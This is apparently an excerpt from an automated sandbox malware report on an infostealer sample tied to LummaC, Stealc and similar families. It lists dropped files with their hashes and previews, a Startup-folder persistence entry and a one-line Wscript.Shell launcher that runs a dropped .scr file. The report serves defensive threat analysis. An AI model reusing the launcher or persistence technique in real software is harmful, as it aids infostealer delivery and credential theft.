        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • VT rate limit hit for: 66fd8d779da5e_EscortsRadios.exe
        TimeTypeDescription
        17:45:49API Interceptor2983x Sleep call for process: Miniature.pif modified
        17:46:03API Interceptor2147x Sleep call for process: DatumHub.scr modified
        22:45:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url
        No context
        No context
        No context
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\527294\Miniature.pifzSHXL8jq8M.exeGet hashmaliciousLummaCBrowse
          nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
            file.exeGet hashmaliciousUnknownBrowse
              file.exeGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousStealcBrowse
                  file.exeGet hashmaliciousStealcBrowse
                    file.exeGet hashmaliciousStealcBrowse
                      file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                        file.exeGet hashmaliciousLummaCBrowse
                          file.exeGet hashmaliciousAmadeyBrowse
                            C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scrzSHXL8jq8M.exeGet hashmaliciousLummaCBrowse
                              nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                file.exeGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousStealcBrowse
                                      file.exeGet hashmaliciousStealcBrowse
                                        file.exeGet hashmaliciousStealcBrowse
                                          file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                            file.exeGet hashmaliciousLummaCBrowse
                                              file.exeGet hashmaliciousAmadeyBrowse
                                                Process:C:\Users\user\AppData\Local\Temp\527294\Miniature.pif
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):179
                                                Entropy (8bit):4.734084780452165
                                                Encrypted:false
                                                SSDEEP:3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5hERvWAAi++mZo5uWAX+Ro6p4EkD5hERvWAAN:RiJBJHonwWDKaJkD/4vHAz+mywWDKaJ2
                                                MD5:E3D4C82D6263EB1B3711B3BAE4172C14
                                                SHA1:718FF254AF4776016B19F00123F2360FEC55B774
                                                SHA-256:9ACFBC7AE1198BA67F816CC86AF14D093F2A74F25FEAEC6D70E656F4FAB7F822
                                                SHA-512:A3705EA0652312DAD11F7C7A70E6AC3345B08D0EC2B2B98E392158E6A2BEF10DA84EECEA6752088B0B247843C3DD3327EA79CE45AE557D440953C7946F9D6C03
                                                Malicious:true
                                                Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\DatumHub Technologies\\DatumHub.scr\" \"C:\\Users\\user\\AppData\\Local\\DatumHub Technologies\\s\"")
                                                Process:C:\Users\user\AppData\Local\Temp\527294\Miniature.pif
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
                                                • Filename: zSHXL8jq8M.exe, Detection: malicious, Browse
                                                • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\527294\Miniature.pif
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):548411
                                                Entropy (8bit):7.9997105904186885
                                                Encrypted:true
                                                SSDEEP:12288:bannn1CfN9SmPFb0MDWm13QwBbiSSUT/04dIZjYgZ/7llUDBryNH:banUN9SmPKMDWm13VWSSI8TzyJyNH
                                                MD5:EC2A006F0D1E59FE65C60F9C5361879B
                                                SHA1:69A90FF69CA89D7579C9E404925FC99BEA2D9077
                                                SHA-256:BC1F9150833C2DD718B0D14AC0E9C4492EF5E6F54DDB1AA4B6EB812FEC323BCF
                                                SHA-512:56371523EE1CF97603A0F35688748C41E7DFFA3B9F759EB75F4471146C6F2D1C99796BB040422922AAA0CA4EF75FBBB844FE5CEE11DA80DE35B02F162607D163
                                                Malicious:false
                                                Preview:.1d.M.......k/..5.i u.$...K...T.=..[XB.5<;.)Te....Q"..9..-p...~.hUo@...9Mj..w.i0...5..*..K.,;f..+F...^.......uK{.Mx..y... /@.z..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.I.'.F...h....................y.......ykC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....$..,P..Myn.2..t.W....z....N...kAv.......y.......ym.......~8.5...x..2).U.j....2>..#.~.|....(..|.m...<..-u,..... ...=...=..M.E..;.v..*.....N.S!.7.9...m%....D..0......-.e.17.C2.{1.[.+I.C.r.......^*k......W....W..F.Y..5*qY3..Nw.....9m......N.....m..>...,......0(.xWfm..R...;-.p../z.....h...*.l$e^.:.l...u2..P....o.........'.J..$a3..g....x...v..M.i..(..Hbb....v..........\.^..uQPG.]n.....@.k;...k.1.......S[..7.....O.
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):893608
                                                Entropy (8bit):6.62028134425878
                                                Encrypted:false
                                                SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 5%
                                                Joe Sandbox View:
                                                • Filename: zSHXL8jq8M.exe, Detection: malicious, Browse
                                                • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):548411
                                                Entropy (8bit):7.9997105904186885
                                                Encrypted:true
                                                SSDEEP:12288:bannn1CfN9SmPFb0MDWm13QwBbiSSUT/04dIZjYgZ/7llUDBryNH:banUN9SmPKMDWm13VWSSI8TzyJyNH
                                                MD5:EC2A006F0D1E59FE65C60F9C5361879B
                                                SHA1:69A90FF69CA89D7579C9E404925FC99BEA2D9077
                                                SHA-256:BC1F9150833C2DD718B0D14AC0E9C4492EF5E6F54DDB1AA4B6EB812FEC323BCF
                                                SHA-512:56371523EE1CF97603A0F35688748C41E7DFFA3B9F759EB75F4471146C6F2D1C99796BB040422922AAA0CA4EF75FBBB844FE5CEE11DA80DE35B02F162607D163
                                                Malicious:false
                                                Preview:.1d.M.......k/..5.i u.$...K...T.=..[XB.5<;.)Te....Q"..9..-p...~.hUo@...9Mj..w.i0...5..*..K.,;f..+F...^.......uK{.Mx..y... /@.z..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.I.'.F...h....................y.......ykC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....$..,P..Myn.2..t.W....z....N...kAv.......y.......ym.......~8.5...x..2).U.j....2>..#.~.|....(..|.m...<..-u,..... ...=...=..M.E..;.v..*.....N.S!.7.9...m%....D..0......-.e.17.C2.{1.[.+I.C.r.......^*k......W....W..F.Y..5*qY3..Nw.....9m......N.....m..>...,......0(.xWfm..R...;-.p../z.....h...*.l$e^.:.l...u2..P....o.........'.J..$a3..g....x...v..M.i..(..Hbb....v..........\.^..uQPG.]n.....@.k;...k.1.......S[..7.....O.
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):84992
                                                Entropy (8bit):7.997485677325137
                                                Encrypted:true
                                                SSDEEP:1536:qbouoPwjE8FNakRASBtmPFbvyhXUgrVTXWCyWfcvBWjzX+lnygm9nW+GL1MuwAdU:q87IYONakRASmPFbKFDrFWDWfkB4MybH
                                                MD5:3262C377488E1D796C59B0A12ED324E1
                                                SHA1:C1ED21FEA0F2841E68E03CF85DD2AA73C6AAF39A
                                                SHA-256:982A434D95E0A3983ACDA25B54F44809747E7C3B46C9482F562C4C92CB466BD8
                                                SHA-512:633690ADE5055972E085107E791C34BEA8B201C2411078032203ADCAB25FBC159458F9F62333F9336422E977A470377F6983CE92F9EC7C5A7755E00B672035F6
                                                Malicious:false
                                                Preview:..L$'..q.>....~&.e?.R...2."to..!.z.".d.BR.. . 6...........&.....s...... N..Z.P..Lg.,2..X....[...~...Hjn..t.....B..J...x...<.Q^.F..F..-~..!....|.U...[..8..<.S5L.....#.).j.$B..5_...5......%Z..."q.k..&...X.uW..r......{.A.z...%lJ[......h.L.?...h6..[.I...r..q.n.i...cM.-.....|....Z.c...-].g9]..Q=..6.....w./.....*.\............e.b...C.B.l.......o..lL......\.W;.N..."...r..T.ud+h...K9.gF..... ...7p.)....g.....Dt*.c...Y..F.o`.-..%.N.34-.g..&;MVA..|...b....."xX..G...i..p......OFL.S_z..B...,..C..c.&)W..\.YS=..#...1z...!..Z_...5...V....@.......|uq/.....@>4....H.......[.[j..43.>.......V^p..eT...X^.K`...M..w.....Sn.c...cjlQE1g.n.hR..t....~Vc..V[".Y.q@s....f...A+.UU~...U.G...H[..$A.....>....ES.7.R...M..{..t........2........8..A;..3.A+I,`9..U)..F...y.<.d8..1.N">.6.q...........9.(...d3t;...........J'.......O....C....J.5qp.S....#.^...u=\..*....i.....|.........G.....K._E.vB.....Fy....=._..X.....o.Z..@5t..#jy.....YD..A.m.8....B......Mi..Ee.6........P...+...
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):99328
                                                Entropy (8bit):7.9982153567289185
                                                Encrypted:true
                                                SSDEEP:3072:lq0mdFVZ9ulYp7ncsPLPrtMASLok+WHcJ4:U0anOls7n5LPreHV
                                                MD5:2509818F86189EB152813047DD1AA904
                                                SHA1:78A204E4A1633F434925C2E52C2BD6768D78EF36
                                                SHA-256:71EDAEEE36E2A29C85DC0580A4C20D1852EC5CDC4CBA10A5F60475070BBF7BF7
                                                SHA-512:F62FA530ACC7834465C63DDB8FF461AE118F64A39914716E75121C96EE6A49337684907C440B8F717BE3A9A0675CEB516DB228ABAA309D9777D29D094BBC24FB
                                                Malicious:false
                                                Preview:.1d.M.......k/..5.i u.$...K...T.=..[XB.5<;.)Te....Q"..9..-p...~.hUo@...9Mj..w.i0...5..*..K.,;f..+F...^.......uK{.Mx..y... /@.z..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.I.'.F...h....................y.......ykC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....$..,P..Myn.2..t.W....z....N...kAv.......y.......ym.......~8.5...x..2).U.j....2>..#.~.|....(..|.m...<..-u,..... ...=...=..M.E..;.v..*.....N.S!.7.9...m%....D..0......-.e.17.C2.{1.[.+I.C.r.......^*k......W....W..F.Y..5*qY3..Nw.....9m......N.....m..>...,......0(.xWfm..R...;-.p../z.....h...*.l$e^.:.l...u2..P....o.........'.J..$a3..g....x...v..M.i..(..Hbb....v..........\.^..uQPG.]n.....@.k;...k.1.......S[..7.....O.
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):7.9978920575963555
                                                Encrypted:true
                                                SSDEEP:1536:fzdj7JkyjPgu7vEzYIJx0P5ZJxOZMHFvzCG4DDsCM:78yj4u7UJah7pHBzC0f
                                                MD5:0CC1937386BA018CAE3E612CDB2D346C
                                                SHA1:56E8BF29FFB4502D9911CAA651B483986FDA14B4
                                                SHA-256:A3B3A73E8D91D6C8787F06F6A6B8D094D1DA49832A3B067D2A709912849F83F4
                                                SHA-512:0F29DCD3E9130C214373DDF297DC88AFE07B6B4C25FE55AB444382EDEAF492D3047D0CDC2E4D544D3F15A5553F1ECB531FC9914B56A886551E63A1FF5B0939CA
                                                Malicious:false
                                                Preview:o6.w{.CKRr..B.I"<......%w}....f~...J.#)....{..?...$7...p...a.c.YKt9.....A;8)..J:..=(.).W..5.>NH...O.}.j.J7..7...?^&.........%.!.Y...i.:<P\4..-.>S|...'n./....!..pL..K#...K..[.b.8 .b...RT9..q!......(...'Sn.....a.,Jqt.vA.T._.....~W<........R.Cl.j...i..&.../..N..N..w0L....G|t..?(Z..{<..fR...u...6...."o|.e.......e.'..l....I..c..P..ir..b...9.,......p...R.Z<.h1.......-U}=--j..J...E..j....=q..J%..;.eP.N.b.NW....Y_...T.~..Q......v.....dC..o..o'...q\.D....)- z%<..s9....Cq..r.'..S.w.#....j.N,.OU.5st.....vuH...@Z.)...u..o..L.#.y.8..)........*{..3;.. s......m..b.'..0.).E....J..K.)E.Fk.F.`0SYW.n.......`.......h.....eYhC....W.c.%.H}H..%N6R.....m....U.X._Mx.b/..T. ....@.s.c FW....{;.X....!F...q^...RF....= ..I...........&...s2.C+..N$MH...Cb......a..w-.B...Y...j.q#....B.#..$.AY..R.....&............:s....(..^r\{....)< ..8I`.f..!.^.0.zz...4.L.H.n...N...).:..kus..-.....-`.K.Nh..vC.D.VG...t..fv.._.g.....>w~...~.n...m..t..BP..K.........>.t..)..m.?
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67584
                                                Entropy (8bit):7.997169896499592
                                                Encrypted:true
                                                SSDEEP:1536:3sbYXbbc+63lzyZfYxww9joGBCZgGbzWgyDDB2BW97yGFd:K/+63lzyZfoww5oGB2kVfB0Gz
                                                MD5:9363F2736820A10BC5049E1AECE63758
                                                SHA1:617FE29C33F7693F0553B2343F7AE85E770C655E
                                                SHA-256:8EC3FDDBF1D5D5BF9C067C3D89B3CF744AB216E1E9CC8EBF54C44B7EC4FD19BE
                                                SHA-512:3F4802CC72FC9827D650E107309EC0545AAC86E6FB9A37C4C189C942DFF9349F5AF5C7EBA7DB69B13B4883875A247B4F5EC1D76C6163DF90A3A02986B9B07AA1
                                                Malicious:false
                                                Preview:..iQ.G.......@.I\...".s.S..!Q..!#..XX.n;\..bY..h{.....H....G\..O.{B..A.p.:mq.^k...E...J.......x..H....3........+....Y..#......t..2..s"6.&....~.Wua@.v...][.o...;.B....LN....C.;h.H.@YhI7......kKjl^.G+tI..h...6.........O}....;.....a....I=F..aJa.uI.....6........Y".gF.F.chL,..Qwy<z....B6o(.v..'...mE....p}...v..^.e7....rccX..QL.......X.l.L.y.l...AL...g)NU.V.).1.6.Y.0.JK..n.T..(.j;~ub.)...m8!....9.......[..E.ol.kj54..o...D?..J.,k...u...........7GR....f.iq;.../........j.......A.#Q..de..........QU....y.v..G......Y....L.#.$.3V...V.M......J.m.....e5.....+f..i}.2..N.Q.n....~<..^o1l.....[8..U.'.G\mG24.q...W..?..[G...0.b.v#,b...6.w.@.y..rD}.F.....!.N.....#/&....8.\..D..1.....o..K.d...w....<..?.`....9XQEF.{}/+.0...........^S.....................qL6.6...Z..HD.8.8....*xr)V|.=.E....y.*8..>.......03...$9L..c...gA@.q..?G.F~v.}...&._.X.rN.........E.....9.i4.....k......]....::..2.>\.u.Z.......b.N"hO.B.3..r.K2..}.PE............!.H.e.O...i.w@I.F. .$.U.m...
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):94208
                                                Entropy (8bit):7.9983384648289055
                                                Encrypted:true
                                                SSDEEP:1536:ZcwGLzWGBkY4quCkqPR16BrGZM3GTIKmJ+4Ty89dldZpKuo1AccldphY8CZkNrKv:tGJ76BrG2WT3mY4TyIFpK5ncldU8CZk0
                                                MD5:E53572D2AD494AEE41D5989C07727607
                                                SHA1:14A610542D7396E6663864F7C35781C02FF44954
                                                SHA-256:9ED1A02BDE74EA658D47004F36E5E5445B333AA7A0B6C39C25CD9269389DAF68
                                                SHA-512:3C2C4F4FB11E56ED533DD66B7FE1FB4939B2122F3DEDDB1CA0D46D6A3B2EEBC2A996197CC2082218C386D2908DCF02E98685AF16A6B291BFC707F3961532FA0C
                                                Malicious:false
                                                Preview:p..l$.......-@.. ......S&U...,..G.....wu\...N...].uH..Y8@.'e.._.....W0.!0K.^t<..'..3aU9...G.......0=.C..C.o.c.k...........el..>..%..r3l_..Y*;E...J....j....Tx.f....i......;..9.h"J..V....sR...H-...Q].bl..H..l...=..n.....a.....VB..d.......+U%....^....9"Q.`K.:.!E..[......A'..8.7p.9.$.\.X....Y..?........?HX..Tc.K.S.{.(..K!".v........%.9..V.~..v...ln....De...M.t.;DqK...~..Q;..B=..HF .>]...Z...e....DY..9....B...Y:Hu...rK..TJ...)._F..c..a.qk>...l.F?.7k..K2-.........M4.$Z..vx9.wbf.B.M.d..k...SR.Q.Q.>e<.).........A."@....'%nf;.Xn...B...F~.....z.i..EC...a..M..!..k...@..F..t.tM,..."m.Og.'....r......-....>#.....7]ZQ..P.i..Gx`..D.....k.|.q].LJ...C......:}...I....+.q6P.(.....l...MMX!;SG..."..hK.7.v[.&.....:C}..4.....X.PR..u t.=...z.hz...sf..e.$6. .}\7.f.7.h...e..[..a.x..Ey.l1.o..p....$=..=S..3..'..k.....I%...N.B...<^R%.............;....C..1...#....d..<....H.AMJ.)Pw.:...G2..U......w......./....%4sZ..B.e.E.....J.....s.}b7f.......%h.U..c.h3.df3.cN.
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:ASCII text, with very long lines (1269), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23660
                                                Entropy (8bit):5.074159310891619
                                                Encrypted:false
                                                SSDEEP:384:cKufYDiz1hk2Sxy8HC2otOIPhnssT/q/jQJaVRfvH5Y3gqn34vEQ+Mv:cK9IHSkMCV/gjQwVpH23gqn34vEHMv
                                                MD5:40B41729F230FAA8C28B9317786898B2
                                                SHA1:D26625B2DF06BB74B653B1981135D2ADE7EEAF1E
                                                SHA-256:71529389790D0DEF6D0808C1E03CED6450E4A3F88E63A01C77C22CE93B79FE3C
                                                SHA-512:358C75F41461384EF9D19B34D18CC1F85257A0ECB51FB096B731F6FA49AC38D8043BEBFE72AD4D7B56D97C402F8AF273DFDAA15C1A17182FFBC6E4499F737907
                                                Malicious:false
                                                Preview:Set Apartment= ..EXTbTroops-Simultaneously-Keith-Beer-Delegation-..IIAffecting-Phil-Tulsa-..XutuPhilosophy-Combine-Scene-Delight-Wages-Trinity-..wOParliament-Columnists-Prev-Whose-Pull-Wave-Convention-Monkey-..ZwLaboratories-Dave-Silent-Stick-Forced-Worried-Belarus-..mOGb-Cord-Dose-Roberts-Power-..DtlsAllergy-Appears-Extensive-Post-Create-Worse-Remarkable-Memorabilia-..uCPossess-Medicine-Honest-Bridge-Military-Admissions-Usd-Indicates-..Set Soma=V..BlResponse-Minister-Den-Truly-Yea-Wanted-Kept-Loan-Racing-..DvFJJustin-Temple-Social-Collector-Atm-Levy-Posters-..ZcInvite-Introduce-County-Downloaded-Throw-Above-Admitted-..GDUses-..PUFacilitate-Monaco-Companies-Personnel-..TjSTFormed-Cap-..rchDetect-Landscape-Airport-Ericsson-Incident-..DcFrHolds-Uw-..zoiMutual-Set-Rider-Shirts-..Set Installed=Z..GUjThunder-Quest-Ridge-..TQUHostel-Visiting-Licking-Explanation-..keGkLivecam-Yugoslavia-Vincent-Invest-Cameron-Moments-Beginner-Lending-..aWSkAmended-Docs-Independence-Prominent-Emerald-Sent-Enha
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:ASCII text, with very long lines (1269), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23660
                                                Entropy (8bit):5.074159310891619
                                                Encrypted:false
                                                SSDEEP:384:cKufYDiz1hk2Sxy8HC2otOIPhnssT/q/jQJaVRfvH5Y3gqn34vEQ+Mv:cK9IHSkMCV/gjQwVpH23gqn34vEHMv
                                                MD5:40B41729F230FAA8C28B9317786898B2
                                                SHA1:D26625B2DF06BB74B653B1981135D2ADE7EEAF1E
                                                SHA-256:71529389790D0DEF6D0808C1E03CED6450E4A3F88E63A01C77C22CE93B79FE3C
                                                SHA-512:358C75F41461384EF9D19B34D18CC1F85257A0ECB51FB096B731F6FA49AC38D8043BEBFE72AD4D7B56D97C402F8AF273DFDAA15C1A17182FFBC6E4499F737907
                                                Malicious:false
                                                Preview:Set Apartment= ..EXTbTroops-Simultaneously-Keith-Beer-Delegation-..IIAffecting-Phil-Tulsa-..XutuPhilosophy-Combine-Scene-Delight-Wages-Trinity-..wOParliament-Columnists-Prev-Whose-Pull-Wave-Convention-Monkey-..ZwLaboratories-Dave-Silent-Stick-Forced-Worried-Belarus-..mOGb-Cord-Dose-Roberts-Power-..DtlsAllergy-Appears-Extensive-Post-Create-Worse-Remarkable-Memorabilia-..uCPossess-Medicine-Honest-Bridge-Military-Admissions-Usd-Indicates-..Set Soma=V..BlResponse-Minister-Den-Truly-Yea-Wanted-Kept-Loan-Racing-..DvFJJustin-Temple-Social-Collector-Atm-Levy-Posters-..ZcInvite-Introduce-County-Downloaded-Throw-Above-Admitted-..GDUses-..PUFacilitate-Monaco-Companies-Personnel-..TjSTFormed-Cap-..rchDetect-Landscape-Airport-Ericsson-Incident-..DcFrHolds-Uw-..zoiMutual-Set-Rider-Shirts-..Set Installed=Z..GUjThunder-Quest-Ridge-..TQUHostel-Visiting-Licking-Explanation-..keGkLivecam-Yugoslavia-Vincent-Invest-Cameron-Moments-Beginner-Lending-..aWSkAmended-Docs-Independence-Prominent-Emerald-Sent-Enha
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):888334
                                                Entropy (8bit):6.622324805393358
                                                Encrypted:false
                                                SSDEEP:12288:rV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:xxz1JMyyzlohMf1tN70aw8501
                                                MD5:D898EF04170C81102E0B1B1554372065
                                                SHA1:7078CEEEF8AC6CD25171B74C3E95F82DFAACAD42
                                                SHA-256:4715054BE219F59E350EFA9DC7C24DF0D1A873C7AD1745E95AD0D2D8AF5FE459
                                                SHA-512:F18D8A0D6989D1AF574ACE38C2562B1EE7C6EFB624D25E95105D2931CD82E2A0799060F4DF354FF30C4158502AF5739292DA30EBDF753883CEE4CD513458B41E
                                                Malicious:false
                                                Preview:.U..E.VW3........F.98u[.F..E.=......%....~..E...7.......t..E..D...E..D...G._.F.^]....}..t..M.......}..t.M........0.U..M..E......P.....uaSVW.}.3.S.5.xL..u,.7.u(.u$.u .u.Q.u..u.P.. .I.....t$8]4t.Sj.....I.Pj0V....I.9..........._..^[].0.%.....U...8SV.u.W.~:...m....].........E.E.P.6..4.I..M.E.VD.~H.M..E..U..}.....d.......s............}....E.P.3....I..E.M.+..U.E.E.+.E.E.P.6.U..M...p.I..}....E..u.M..}.f..........E...}.f.......E...E...}.f.......E...E...}.f......f..............t(.E.f.........u..........E..+...;............t'.E.f........`u..........E..+...;........U......................... ..R.....@..U..._^[..]....}.f.FX.......f......f.F\f......t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5295
                                                Entropy (8bit):6.062016536833128
                                                Encrypted:false
                                                SSDEEP:96:KxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP0:IHAeOqAFDw09CV/2nPvj6DdMP0
                                                MD5:003DEB18901ED03CA41DB0BE942085F0
                                                SHA1:F3BC046B67CB0866E448FD76B2638D87B9C68DE3
                                                SHA-256:0BC723123090AFB33DE5AF8B415DBC7A110600EE00D0400FE88231C8714AE57E
                                                SHA-512:6F003189BC0F657391B609FF68DC24B992C0487BD92C06857A7C32733E0E65F1B8C70D76A31F7037794463674502AAFC827FF0BA240C7623B5451BD68881B546
                                                Malicious:false
                                                Preview:phisexyerrorspuzzle..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...........................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39483
                                                Entropy (8bit):7.9948178513482855
                                                Encrypted:true
                                                SSDEEP:768:Y528rbaZw5SoM6gaToBWp6qfrKR6OKqYDily8tVxr+/NUkXohb:v8rbcoM6g7W0Urhq/Nrxr+//Xo9
                                                MD5:7219F1D95ABB31BBE4F64C4A9A4C6618
                                                SHA1:FB0AAC29620B21F6A26826A5B53EAF6F5BCDE224
